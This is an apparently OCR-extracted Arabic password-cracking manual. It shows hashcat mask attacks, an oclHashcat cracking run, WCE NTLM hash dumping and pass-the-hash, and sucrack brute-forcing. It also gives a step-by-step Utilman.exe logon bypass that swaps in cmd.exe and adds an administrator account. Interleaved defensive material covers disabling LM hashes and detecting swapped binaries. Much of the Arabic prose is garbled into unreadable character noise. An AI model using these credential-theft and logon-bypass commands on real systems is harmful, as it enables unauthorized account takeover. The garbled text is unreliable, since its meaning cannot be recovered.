  0 = Straight
  1 = Combination
  2 = Toggle-Case
  3 = Brute-force
  4 = Permutation
  5 = Table-Lookup

The Combination attack (-a 1), for example, takes two wordlists and joins every word of the first with every word of the second to form new candidates, which catches passwords built from two dictionary words.

2. Rule-based attacks

A rule set is a list of transformations that hashcat applies to every word of the dictionary before hashing it, producing many variants of each word: appending digits, capitalizing, reversing and so on. Hashcat ships with a number of ready-made rule files. The leetspeak rules, for instance, try the "leet" versions of each word, with letters replaced by look-alike digits and symbols (p@ssw0rd for password). You can also write rule sets of your own. A rule file is selected with the -r switch. Some of the most useful shipped rules are:

Best64.rule, passwordspro.rule, d3ad0ne.rule, and leetspeak.rule

The rule syntax is documented at:

http://hashcat.net/wiki/doku.php?id=rule_based_attack
3. Mask attacks

A mask describes the structure of the passwords you expect, position by position, using placeholders for character classes. Hashcat's MASK for two digits, six uppercase letters and two symbols, for instance, is:

?d?d?u?u?u?u?u?u?s?s

It is used with attack mode 3 in place of the dictionary:

root@kali:~/Crack# hashcat -m 1000 -a 3 hash.txt ?d?d?u?u?u?u?u?u?s?s -o cracked.txt

A Mask attack is a Brute force attack restricted to a character set (Charset) per position: instead of trying every character at every position, it tries only the candidates that fit the mask, which shrinks the keyspace enormously. The built-in charsets are:

Built-in charsets

  ?l = abcdefghijklmnopqrstuvwxyz
  ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  ?d = 0123456789
  ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~   (the set begins with a space)
  ?a = ?l?u?d?s

You can also define your own charsets (custom charset) when the built-in ones do not match the password policy, for instance digits plus a few letters. Up to four custom charsets are defined with the switches -1 to -4 (or --custom-charset1 to --custom-charset4), and they are referenced in the mask as ?1 to ?4, just like the built-in ones:

* Custom charsets:

  -1, --custom-charset1=CS
  -2, --custom-charset2=CS
  -3, --custom-charset3=CS
  -4, --custom-charset4=CS

User-defined charsets
Example:

  --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
  -2 mycharset.hcchr         : sets charset ?2 to chars contained in file

A custom charset can be given as literal characters, as built-in charsets, or as a mix of both; all of the following define ?1 as lowercase letters plus digits:

  -1 abcdefghijklmnopqrstuvwxyz0123456789
  -1 abcdefghijklmnopqrstuvwxyz?d
  -1 ?l0123456789
  -1 ?l?d
  -1 loweralphanumeric.hcchr   # file that contains all digits + chars (abcdefghijklmnopqrstuvwxyz0123456789)

Example

The following commands create the following password candidates:

  command:  -a 3 ?l?l?l?l?l?l?l?l
  keyspace: aaaaaaaa - zzzzzzzz

  command:  -a 3 -1 ?l?d ?1?1?1?1?1
  keyspace: aaaaa - 99999

  command:  -a 3 password?d
  keyspace: password0 - password9

  command:  -a 3 -1 ?l?u ?1?1?1?1?1?119?d?d
  keyspace: aaaaaa1900 - ZZZZZZ1999

  command:  -a 3 -1 ?dabcdef -2 ?l?u ?1?1?2?2?2?2?2
  keyspace: 00aaaaa - ffZZZZZ

  command:  -a 3 -1 efghijklmnop ?1?1?1
  keyspace: eee - ppp

Charset files for other languages and code pages ship with hashcat and are loaded the same way, e.g.:

  -1 charsets/standard/German/de_cp1252.hcchr
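The mask and charset rules above, as an added example that is not hashcat's code: it expands built-in and custom charsets (-1 to -4, which may themselves use ?l, ?d and so on), turns a mask into one character set per position, and reports the keyspace size and the first and last candidate, reproducing the keyspace lines listed above. Sizing the keyspace before a run is the check worth making: ?a at eight positions is already 95^8 candidates. Dropping duplicate characters from a custom charset is an assumption about hashcat's behaviour, and the candidate enumeration is plain lexicographic order, not necessarily hashcat's internal order.

```python
"""Hashcat-style mask expansion and keyspace sizing. Added example, not
hashcat's code; charset de-duplication is an assumption."""
import string
from functools import reduce
from itertools import product
from operator import mul

BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,          # ?s: space plus the 32 ASCII symbols
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def _tokens(spec):
    """Split '?l19?d' into ('?','l'), ('c','1'), ('c','9'), ('?','d')."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            yield "?", spec[i + 1]
            i += 2
        else:
            yield "c", spec[i]
            i += 1


def _resolve(kind, value, custom):
    """A token -> the characters allowed at that position."""
    if kind == "c" or value == "?":          # literal character; '??' is a literal '?'
        return value
    if value in BUILTIN:
        return BUILTIN[value]
    if value in custom:
        return custom[value]
    raise ValueError(f"unknown charset ?{value}")


def expand_charset(spec, custom):
    """A -1..-4 definition such as '?dabcdef' or '?l?u' -> string of characters."""
    chars = "".join(_resolve(k, v, custom) for k, v in _tokens(spec))
    return "".join(dict.fromkeys(chars))      # drop repeats, keep first-seen order


def parse_mask(mask, custom_defs=None):
    """Mask plus {'1': '?l?u', ...} -> list with one character set per position."""
    custom = {}
    for key, definition in (custom_defs or {}).items():
        custom[key] = expand_charset(definition, custom)
    return [_resolve(k, v, custom) for k, v in _tokens(mask)]


def keyspace(slots):
    """Number of candidates the mask produces."""
    return reduce(mul, (len(s) for s in slots), 1)


def first_last(slots):
    """The two candidates hashcat prints as the keyspace bounds."""
    return "".join(s[0] for s in slots), "".join(s[-1] for s in slots)


def candidates(slots):
    """Every candidate, in lexicographic order (not hashcat's internal order)."""
    for combo in product(*slots):
        yield "".join(combo)


if __name__ == "__main__":
    for mask, defs in [("?d?d?u?u?u?u?u?u?s?s", None),
                       ("?1?1?2?2?2?2?2", {"1": "?dabcdef", "2": "?l?u"})]:
        slots = parse_mask(mask, defs)
        print(mask, keyspace(slots), first_last(slots))
```

The ?l x 7 mask used in the oclHashcat run further down gives keyspace 26^7 = 8031810176, the figure shown in that run's Progress line; dividing the keyspace by the reported speed is how to predict the run time before starting it.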
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OclHashcat 

L_fl<j all^dll <jujUja3l ^cSl- ^ alia all (Jjt.uuII ^cXS- 4_ijL^a ;tgiV jj^>^ ( ** il ^ CIjIj^VI ^jjojIj jSI 

Jj» ^aUaj (^Ic (Jasu Igil AiLjaVU .GPU ^l«^Luit Ig-AJcXL Igic t all^J I g £3 j hasilCat fibVl <-d^klab<Jl dljLaJl ^jjoij - laJLudJ 



d:\tools\oclHashcat-1.20>oclHashcat64.exe hash -m 8300 -a 3 ?l?l?l?l?l?l?l 
oclHashcat v1.20 starting... 

Device #1: Hawaii, 3072MB, 1000Mhz, 44MCU 

Hashes: 1 hashes; 1 unique digests, 1 unique salts 
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes 
Applicable Optimizers: 
* Zero-Byte 
* Not-Iterated 
* Single-Hash 
* Single-Salt 
* Brute-Force 
Watchdog: Temperature abort trigger set to 97c 
Watchdog: Temperature retain trigger set to 95c 

[cracked NSEC3 hash line: unreadable in extraction] 

Session.Name...: oclHashcat 
Status.........: Cracked 
Input.Mode.....: Mask (?l?l?l?l?l?l?l) 
Hash.Target....: [unreadable in extraction] 
Hash.Type......: DNSSEC (NSEC3) 
Time.Started...: 1 sec 
Speed.GPU.#1...: 1375.5 MH/s 
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts 
Progress.......: 935370752/8031810176 (11.65%) 
Skipped........: 0/935370752 (0.00%) 
Rejected.......: 0/935370752 (0.00%) 
HWMon.GPU.#1...: [values unreadable] Util, Temp, Fan 

Started: Sat Apr 26 20:59:29 2014 
Stopped: Sat Apr 26 20:59:31 2014 

d:\tools\oclHashcat-1.20> 



Other Password Cracking Tools 

Password Unlocker Bundle available at http://www.passwordunlocker.com 

Proactive System Password Recovery available at http://www.elcomsoft.com 

Windows Password Cracker available at http://www.windows-password-cracker.com 

WinPassword available at http://lastbit.com/ 

Passware Kit Enterprise available at http://www.lostpassword.com 

PasswordsPro available at http://www.insidepro.com 

LSASecretsView available at http://www.nirsoft.net 

LCP available at http://www.lcpsoft.com 

Password Cracker available at http://www.amlpages.com 

Kon-Boot available at http://www.thelead82.com 

Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com 

Hash Suite available at http://hashsuite.openwall.net 

SAMInside available at http://www.insidepro.com 

Windows Password Recovery available at http://www.passcape.com 

Password Recovery Bundle available at http://www.top-password.com 

Krbpwguess available at http://www.cqure.net 

Windows Password Breaker Enterprise available at http://www.recoverwindowspassword.com 

Rekeysoft Windows Password Recovery Enterprise available at http://www.rekeysoft.com 



Windows Credentials Editor (WCE) 

http://www.ampliasecurity.com/research/windows-credentials-editor 
cjUU cJi^ j 4_*j1I31 J Ail^ajj J j^3! cjLuk j j^J sbt ^ Windows Credentials Editor (WCE) 
^^ic ilg^hviml (j^-GJ staVI *>i& .(kerberos j ^j^A* j^I j^I CjLoK ^lm / NT ) tgj <iajj^ll ^LucVl 

J cj^U^ <>) s jSlill <> NT/LM c>M cA- J ja^JI JjjL t jj^ijj ^ (pass the hash) c>M j^j* 3 4 Jliall 

jl jj^jjj ^Uaj ^ l^l^klojl D^lclj KerberOS J^lia C5 ic J jj^aJlj t(^Jl t^jl < . n£ ^lajai dlVU^ajl tdlAiaJlj ;4_Jclili3l 

ij tlluaja ^2003 6 C5^ (J^) JJ^J r*^^ C5^J -C^J^^ jW"^ (j^O^ jj^J <J*1 ~JJQ*^ (JW^ CJ J 1 ^ ga^Ldll <Jij 

.8 jj^j 2008 

.hashdump7 ISA^ ^ meterpreter 

. jjibj Jjisu^ill ^Uaj Ja*j j /usr/share/wce J^^\ ^ UalA\ tiA ^ a^uoij 

C:\wce\> wce.exe [options] 

Example: 

C:\wce\>wce.exe -o output.txt 

produces 

Administrator:WIN-D4CC369A8C5:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C 
willYbQY:WIN-D4CC369A8C5:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 
WIN-D4CC369A8C5$:ALDEID:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 



^ b> 1 ^ ^ ^—^-^ ^4 * J^^" mimikatz staVI £>i& ^1 <jl t . 1^ j 
-1 List logon sessions and NTLM credentials (default). 

L£' UJ^ WCe l^Laai AiC ^^jJal jliaVI ^J^a j3l j& J ^ (j^aLkJl (jjilg-Ilj jjAlijll <J (Jj? ' ^ ^ L>^ ^-^^ lP 3 ^ 3 ^ f ^IjujJ 

-s Change NTLM credentials of current logon session. 

6^J^. CliljUj ^l^cl jl J^^ll (Jj^ > >nj ^ala (j-<Ui (j^X-^ ^Aa^Laid ^^^J ^ NTLM (JJJ^ J^*^ (*J^ 
wce.exe -s <username>:<domain>:<lmhash>:<nthash> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 

Changing credentials of current logon session (00024E1Bh) to: 
Username: testuser 
domain: amplialabs 
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE 
NTHash: 0CB6948805F797BF2A82807973B89537 
NTLM credentials successfully changed! 
How To Create A New Logon Session And Launch A Program With New NTLM Credentials? 



wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe 

-r List logon sessions and NTLM credentials indefinitely. Refresh every 5 seconds if new sessions. 
-c Run in a new session with the specified NTLM credentials. 

-e List logon sessions NTLM credentials indefinitely. Refresh every time a logon event occurs. 
-o <file> Save all output to a file. 

i^VI (jjj^ <>* ^ (4j NTLM £ jjII c> lA* 

wce.exe -g <cleartext password> 
For example: 

C:\Users\test>wce.exe -g mypassword 

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa 
(hernan@ampliasecurity.com) 
Use -h for help. 
Password: mypassword 

Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

CmosPwd 

^u3! 4 JjS/j^ c*U ^il CmosPwd .(Basic Input Output System)BIOS jjj* ^ CmosPwd ^m** 

.CMOS fcUU j\ c^Us^VI 

Physical access attacks with sucrack 

. (Physical access password attacks) c^Ull Jj^jI! ^j^a iiiiil SUCrack i* ^ ^ 

cjLLu^ j^£3 (brute force attack) ^>l^l Sjall (multi threat) ^jULuJ! sbi ^ SUCrack 

LiA^C .llixa <j| CS"^ 6 (* J^£^ ^ .<-S^ ~ laJLui^ J-J jVI (JjxjolI] (ill ^ajujJ (JJJ^iJ (jgk SU ,>*VI .SU J-*^ * ^ all ^Ld^luixJl 

;l^l^kluj| Uj£ <lj cjI jlrk ajJ. SUCrack cJ^^I 
. SUCrack J *^L^JI <>aj*i ^ (—help) 

L_fllillVI J J^-^ J J J^"^ Jj> > ^IS ^ilt ^^kjjaixJl jj^-ilL till ^joaj (-1) 
<C5 il jj 3 cs-^J^*^ ^AslSI .CjUI > (J^ajC ^aJJ lAAjc j ^1 jjll ^^C ^nrJi] till ^joiJ (-§) 

.V ^1 ^.iki^j c ^i_uj ANSI escape ^ ^ (-a) 

.SUCrack ^ <oVinn ^jl (^ill CjUIaxJI a^c ^j^j] till ^joij (-w) 
La s^txi J j^-^ Jj> > >n jl^-o diLjafl LoK c— iaia .ia.1 j ^l^kjjojl J > ^qj ^j£3 j j cj5 j J cjUL&«J) ^ ^jAxJI Sjbl SUCrack 

... JxD uL£ 

Siati ^lia .Uaa* <JLojj Jc Jj^a^i c_a jjoj ttilli L_a!>la> lie CjI aKH ^jI j3 Ale ( . i SUCrack^-^^ <J^ u-* -1 

icPVIS sucrack^Vl ijiiij Jliajjll 

# sucrack /usr/share/wordlists/rockyou.txt 

J c_je jjj 6 jljj 6 J£ cjUL-oa.VI o^j^ <js* j^j J u /1^ t j sucrack J*^> J ^! -2 

:g JU3l j^Vl ^l^iil A&*j t^l^ki^VANSI escape j 
# sucrack -w 2 -s 6 -a /usr/share/wordlists/rockyou.txt 

Bypass Windows Logons with the Utilman.exe Trick 

4.uiLui3l ^x&a cJ jll <>— ^ cl^j^ f i^LuiaH ^-Uijaii] a^iaj^i ^jj ? jjALj (Jjt.uuII ^Uaj J ajUj (j^iflajUtilman.exe 
(On Screen Keyboard) J^ ^iilLJI 4a.j3j 'Narrator j < (High Contrast Theme) c*^' ujW^' j 6 (Magnifier) 

J laill J) J ja.^1 » " >; 

o^cLoiaI] 4_alaJ! ^jj^ ^ i o 9 ji j Windows J] <J j^-^ 1 ^ J j» j 1 c alajja (jjill <jjjU3I s^qLuia] 11a a - 

J ^aJl (Jji^jaaj CjLAac jjlaJ (j-G L^-Lq ii£Luaj ^jl U3 (j^-<^ S^*-* ^-^j 43^- VI 1 ^^ia J^*^ u -0 

L-ali jl J ja.,^31 cJj> * ^ ^alaJI jjj-<Ji I jjoij ^ Uj!)Iac ^jl lij (JjaJI J ^ W^indows J j^-^^ cJj> * ^ jjW^ 
e J j^-^^ ' ci^ ^Uail! ^(nialware) a *^;^^ c^llulalll ^aL^JI ^ i^Lm*]! l-Lj^su daliLa 

liA dip. . Jj^j Jj^^^ U > (i^j^ c> Utilman u^3 uV li* lUs 

Utilman.exe^i^^ Jj^j lij . Windows\System32^V^^ ^'j^ l?^^ ci^i Utilman.exe J^-^ fj* 
.(system privileges) &\JJLa\ ^ j^ljVl Jj^ajll ja. A^ uj^ < cmd.exeJ^ j^i 

<xJaj| ^ root L-jLaiaJ] <BUui ^ ^1 j Jj^ijj Jj *j£ i3I ^Uaj cjI jLjlftl (system privileges) ^Uajlt CjI jLjIqI 

.linux 



fLuUl oIaj uLS 

. cmd.exeJ^ j^l ^Utilman.exe cjULJI ^Ikj J jU aL^ j JJ ^UaJ JS JjSj VJ 

^j-gj .^>a.l ^Uaj (slave) C5 O^J^ ^ W^j l fl^Loi^l ^Uail! (Jjt.uuII ^Uaj ^^Ic ^jlaJ ^^11 L-lL a\\ ^ajlll <!l jj ■ 

Uj^aJ U£ Live kali CD jt s^' ^l^i^l j UBCD4Win " \h ^ o- 3 ■ 

.8 jl 7 JVista Jj^j ls'^ CD jl DVD ^1 ■ 

^ ^ Live kali CD ^^^1 aJl£> UjLoj jUKj ^3 
c> JUj J jVl ^1^3! Jj J^j3l Windows 7 v> o- 3 ^ 1 DVD o-^J c> ."DVD 7 jj^j" 

.NEXT c3j3 JAjI t^iiUJl <a. j3 (jjmnj <1ax3Ij 



Repair your computer " jVl c3ja jajI t JiuJI jj^VI L_ulaJI J ^^1! Jiuil 44_JU3I <aij^ail J 
^Uaj . "Use recovery tools that can help fix problems starting Windows" AAl * ji^JI 

.Next c3j^ t^Lajtall (j-a (Jjt.uuII ^Uaj Asu ;^-!>L^I (Jjt.uuII 



[Screenshot: System Recovery Options dialog. Text: "Use recovery tools that can help fix problems starting Windows. Select an operating system to repair. If your operating system isn't listed, click Load Drivers and then install drivers for your hard disks." Table columns: Operating System, Partition Size, Location; one entry on (C:) Local Disk (size unreadable in extraction). Second option: "Restore your computer using a system image that you created earlier." Buttons: Load Drivers, Next.] 



j 



. (Command prompt)^ jVI Choose a recovery tool" 4^ ujV* 

j-ljVl SiaU" c^ja ^ jVI 

C:\ 

cd windows\system32 
ren utilman.exe utilman.exe.bak 
copy cmd.exe utilman.exe 

<^uaij iaL j±\ ^jojI Utilman.exe C5^^ c^LJI 4_lgjuij sjIcI system32 ^->^ ^ cj 

.c5^Vl Jj^ll L_aLJI ^ Utilman.exe ^ ^ cmd.exe 
<!I^1ujI Liajl o^ajj iaia ^L^VI j^u (jjjia jc- cmd.exe jVI ^ >^ Utilman.exe <-&JI JI^jIujI -ujIS s j£alt jl di^ 

^3 lil . 4-^. j>» ^^^ic <J jj^^JI ^1 c^^j Windows + U ^-^j^ t^-pUt Aij^UU jii j.ua£]| <J^*-^ ^^^^ 

(jl^ (Jjxju^j a j ^Ua ^j-<i # <J (Jj^ > uj <jujLuj ^Ijj j-al jVI ^-^j ^ Alt + Tab cjj^ 6 ^>^ j*^ ^-^ j - * j$ 
Sj j^JI ( jj^i^luL4j A if\W\ jjj-aJI ^-aK (Jjjxj SjIc-I 

^i^^JjoixJU *L^aLaJI S^iuuJl CjliLJl J jj^ jll ^Iflj (iljli >s jj^ laajud^ L-jLudaJ JjJ-a (JjUxJ S^lcl aJ lil ; jj^j 

j£Ij cdlil .^h J^A? 

jjjirlj ^ jij L_fl jjuj 6<JHa3l I ^ (J^^ C-P^ J* ^^"^J JJJ-^ (jjJJLJ S^lcV 

. "hunter2' '^JohnDoe's jj^J! 

net user JohnDoe hunter2 
net user 

(J^IaJ! l_j jj^JI l^jflUiajj t(abcl23 ; jj^>^ j NewGuy i^vi^^l ^0 J*^' ^ ^ <^ ^^^^ l-jIju^ eXJ&y 

l^^ 3 j^*^ 

net user NewGuy abc123 /add 

net localgroup Administrators NewGuy /add 

j^'jVl t utilman.exe*^l»^V 

C: 

cd windows\system32 
del utilman.exe 
ren utilman.exe.bak utilman.exe 

c_£1£j c^JjLuj Cj3 j ^ 4JLuuL lj^ ^ill Jji^Jl ^Vi< noil ljLua 4j| 

net user NewGuy /delete 

Server 

. J j^^ll ' ^ jj^ ^ lU^-*^ Mimikatz sbVI ^1 i^LujI Uiajl 

"sethc.exe" L -^- ( ^^j . jj^j^ J j^-^^ » ^ a.&\-& t^ll Liajl ^jujj <LLuJI <Ljia3l (jjaiij "Sethc.exe" t *^ c^-^- l!^'^*^^ 
lJ^juo Ij^i 4^1 jjII ^ cj! ^ o^Shift C5 1& c_j jjjJU lij 4<j^UJI ^UxJI jlLj .Windows Sticky Keys 
j j^ua ^utilman.exe ^ ^? ^ ^^J^ ft^^ .sticky key dialog box J gj* ls^jj 

^ ^^ic j^l jVI ^1 ^^jj <jU J j^"^ Jj> > >n 4_JjUi CjI j-<i (Jja^ shift L_jjjJa31 
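The Utilman and Sticky Keys tricks above leave two traces on disk: an accessibility binary whose bytes are identical to cmd.exe, and the renamed original (utilman.exe.bak). The following added example (not part of the original manual) is a defender's check for both. It hashes the accessibility helpers Windows launches from the logon screen and compares them with the shells in the same directory, and it lists leftover backup copies. The directory layout, file contents and the demo builder are constructed for this example; on a real machine you would point `find_swapped_binaries` at C:\Windows\System32.

```python
import hashlib
import os
import tempfile

# Accessibility helpers that Windows starts from the logon screen; the
# Utilman/Sethc trick replaces one of them with a copy of a shell.
ACCESSIBILITY_BINARIES = ("utilman.exe", "sethc.exe", "osk.exe",
                          "narrator.exe", "magnify.exe", "displayswitch.exe")
SHELLS = ("cmd.exe", "powershell.exe")
LEFTOVER_SUFFIXES = (".bak", ".old", ".orig")


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_binaries(system32_dir):
    """Return {'swapped': {helper: shell_it_matches}, 'leftovers': [...]}.
    A helper whose hash equals a shell's hash has been copied over; a file
    such as utilman.exe.bak is the original that the swap renamed aside."""
    shell_hashes = {}
    for name in SHELLS:
        path = os.path.join(system32_dir, name)
        if os.path.isfile(path):
            shell_hashes[sha256_of(path)] = name

    swapped, leftovers = {}, []
    for entry in os.listdir(system32_dir):
        lower = entry.lower()
        path = os.path.join(system32_dir, entry)
        if lower in ACCESSIBILITY_BINARIES and os.path.isfile(path):
            digest = sha256_of(path)
            if digest in shell_hashes:
                swapped[lower] = shell_hashes[digest]
        for suffix in LEFTOVER_SUFFIXES:
            if lower.endswith(suffix) and lower[:-len(suffix)] in ACCESSIBILITY_BINARIES:
                leftovers.append(lower)
    return {"swapped": swapped, "leftovers": sorted(leftovers)}


def build_demo_system32():
    """Constructed stand-in for System32 (assumption: tiny fake binaries):
    cmd.exe, a utilman.exe that is a byte-for-byte copy of it, an untouched
    sethc.exe, and the utilman.exe.bak the trick leaves behind."""
    folder = tempfile.mkdtemp(prefix="demo_system32_")
    files = {
        "cmd.exe": b"MZ cmd-demo",
        "utilman.exe": b"MZ cmd-demo",        # identical bytes: copied over
        "utilman.exe.bak": b"MZ utilman-demo",
        "sethc.exe": b"MZ sethc-demo",
        "powershell.exe": b"MZ powershell-demo",
    }
    for name, data in files.items():
        with open(os.path.join(folder, name), "wb") as handle:
            handle.write(data)
    return folder


if __name__ == "__main__":
    print(find_swapped_binaries(build_demo_system32()))
```

A hash comparison catches a straight copy; a production check would additionally verify that each helper still carries a valid Microsoft Authenticode signature, and BitLocker or another disk-encryption control prevents the offline rename in the first place, since the trick depends on editing System32 from a boot CD.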

LM Hash Backward Compatibility 

j Windows Server 2003 j Windows 2000 J^-^ ja LM Hash Backward Compatibility 

^ Kerberos ^^"^^ V Windows 95/98 . Jj^ijj cjljl^al J^^j ^ ^s-^ (j^^iu^l Ai^l^a-o 

(^Windows Server 2003 j 2000 jj^j 0^ 'Backward Compatibility J^' <> 

LAN Manager (LM) authentication 
Windows NT (NTLM) authentication 
NTLM version 2 (NTLMv2) authentication 

."LM hash" LM ^1^3! J^jjjjj . Kerberos j NTLMv2 'NTLMvl (Unicode hash) NT Hash ^ 

jli ^LM hash oj ^ lit .aSjLuJI CjI jl^VI ^ (Jalj^l J^l <> tUjjjjJa j£j ^ lil <LM hash oj ^ V 

. Jaljil lS^^ ^ (j^j^U jl Windows98 'Windows95 
(How to Disable LM HASH) LM HASH *UUI hLl 



:^LM hash frlW J> Sjs j±j* 



(Implement the NoLMHash Policy by Using a Group Policy) Group policy ^l^lajU NoLMHash ijaS -1 

i^JUl! CjIjI^JI ^-fij 'local group policy ^ ti^j J^U ^> SAM LM hash j^ 2 J^*^ 

In Windows version -> In Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> Security Options. 

In Windows server version -> In Group policy, select Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options. 

In the list of available policies, double-click Network security: Do not store LAN Manager hash value on next password change 
- Click Enabled -> Ok 



[Screenshot: Local Security Policy, Security Settings > Local Policies > Security Options. The policy "Network security: Do not store LAN Manager hash value on next password change" is shown as Enabled. Neighbouring Network security policies visible: Allow PKU2U authentication requests (Not Defined), Configure encryption types allowed for Kerberos (Not Defined), Force logoff when logon hours expire (Disabled), LAN Manager authentication level (Not Defined), LDAP client signing requirements (Negotiate signing), Minimum session security for NTLM SSP based clients and servers (Require 128-bit encryption), and the Restrict NTLM entries (Not Defined).] 


■8j 7j lS^-*-*^ 4 rthil Lixialjiial ^jja jll uj^ j Enable j uj^ t . 1 *>J J»^51j 

(Implement the NoLMHash Policy by Editing the Registry) cJ?^ JjjL j& NoLMHash <^A^ iiiu -2 

registry ^ ^tSLJI cjkj^ c*Uij 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 

NoLMHash ^^4j f ^ 

[Screenshot: Registry Editor at Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Values listed: (Default) REG_SZ (value not set); auditbasedirectories REG_DWORD 0; auditbaseobjects REG_DWORD 0; Authentication Packages REG_MULTI_SZ msv1_0; Bounds REG_BINARY 00 30 00 00 00 20 00 00; crashonauditfail REG_DWORD 0; disabledomaincreds REG_DWORD 0; everyoneincludesanonymous REG_DWORD 0; forceguest REG_DWORD 0; fullprivilegeauditing REG_BINARY 00; LimitBlankPasswordUse REG_DWORD 1; LsaPid REG_DWORD 0x00000240 (576); the added NoLMHash value REG_DWORD 0x00000001 (1) (its name is lost in extraction); Notification Packages REG_MULTI_SZ scecli; ProductType REG_DWORD 4; restrictanonymous REG_DWORD 0; restrictanonymoussam REG_DWORD 1; SamConnectedAccountExists REG_DWORD 1; SecureBoot REG_DWORD 1; Security Packages REG_MULTI_SZ.] 
(Use a Password that is at Least 15 Characters Long) 15 i> j& JSVl Jc jjj* CjUK ^^ki^j -3 
^iLlaaj jla ^jjj L* La! l_ fl^p. 15 lS^I uj^ cs-^J L1VT HASH J JJ^>^ ( ** & ^ jjLuHj ^ j£i jjAbjll ial jj jl i— ^ 

_iaia l_aj^ 14 ^*juj jl ILLoj LIS La£ LM hush J 
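The three measures above (Group Policy, the NoLMHash registry value, 15-character passwords) share one caveat the policy name itself states: the LM hash is only dropped at the next password change, so accounts that do not change their password keep a crackable LM hash. The following added example (not part of the original manual, and not WCE's code) audits a credential dump in the user:domain:lmhash:nthash format that WCE printed earlier in this chapter and reports which accounts still hold an LM hash or use a blank password. The sample dump is constructed; only its Administrator line mirrors the WCE output shown above, and the hashes of the empty string are the well-known constants.

```python
# Well-known hashes of the empty string. WCE prints the first one for every
# account whose LM hash is not stored (NoLMHash in effect, or password > 14 chars).
EMPTY_LM_HASH = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Constructed sample in WCE's user:domain:lmhash:nthash format (assumption:
# the first line mirrors the Administrator entry shown earlier, the rest are made up).
SAMPLE_DUMP = """\
Administrator:WIN-D4CC369A8C5:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
svc_backup:WIN-D4CC369A8C5:AAD3B435B51404EEAAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Guest:WIN-D4CC369A8C5:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
WIN-D4CC369A8C5$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
"""

HEX_DIGITS = set("0123456789abcdefABCDEF")


def parse_dump(text):
    """Parse dump lines into dicts; malformed lines or non-hex hashes are rejected."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) != 4:
            raise ValueError(f"unexpected line: {line!r}")
        user, domain, lm, nt = parts
        for value in (lm, nt):
            if len(value) != 32 or not set(value) <= HEX_DIGITS:
                raise ValueError(f"bad hash in line: {line!r}")
        rows.append({"user": user, "domain": domain,
                     "lm": lm.upper(), "nt": nt.upper()})
    return rows


def audit_dump(text):
    """Map each account to a list of findings:
    'lm-hash-stored'  an LM hash is still on disk, so the password is at most
                      14 characters and attackable as two 7-character halves;
                      NoLMHash only clears it at the next password change.
    'blank-password'  the NT hash is the hash of the empty string."""
    findings = {}
    for row in parse_dump(text):
        issues = []
        if not row["user"].endswith("$"):      # machine accounts rotate their own secret
            if row["lm"] != EMPTY_LM_HASH:
                issues.append("lm-hash-stored")
            if row["nt"] == EMPTY_NT_HASH:
                issues.append("blank-password")
        findings[row["user"]] = issues
    return findings


def accounts_needing_reset(text):
    """Accounts whose password must change before NoLMHash actually protects them."""
    return sorted(user for user, issues in audit_dump(text).items()
                  if "lm-hash-stored" in issues)


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:20} {', '.join(issues) or 'ok'}")
    print("force password change for:", accounts_needing_reset(SAMPLE_DUMP))
```

The same audit applies to a SAM or NTDS export taken during an authorized assessment: after enabling the policy, every account that still reports a non-empty LM hash needs a forced password change, and a 15-character minimum removes the LM hash regardless of policy.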

How to Defend Against Password Cracking jjj^t cjU*a ±± jilii < 

l^L^I <jLc. ^j^j3 f^^j g\U i ™ j& 'Password Hacking ^4 j '(Password Cracking) 

j^-^ J& JJJ-* J J > ^ AjjojLojVI AijjJall . JJJ-* (J^ ^j'j^' t^UaJ tA^jJal] 4j £JJ^a» jjxll ^l >lkluj VI 

< " & jj <Jj^-^ jj;^^ lLu^ jj jjj>i^3l 4_ixijj! jk ^I^IujL tilli ^jj . IjIj^jj IjIj* a afc^ * < ** ^ jj AJjL^xi <_£j^.l Aijjla . JJJ - ^ 

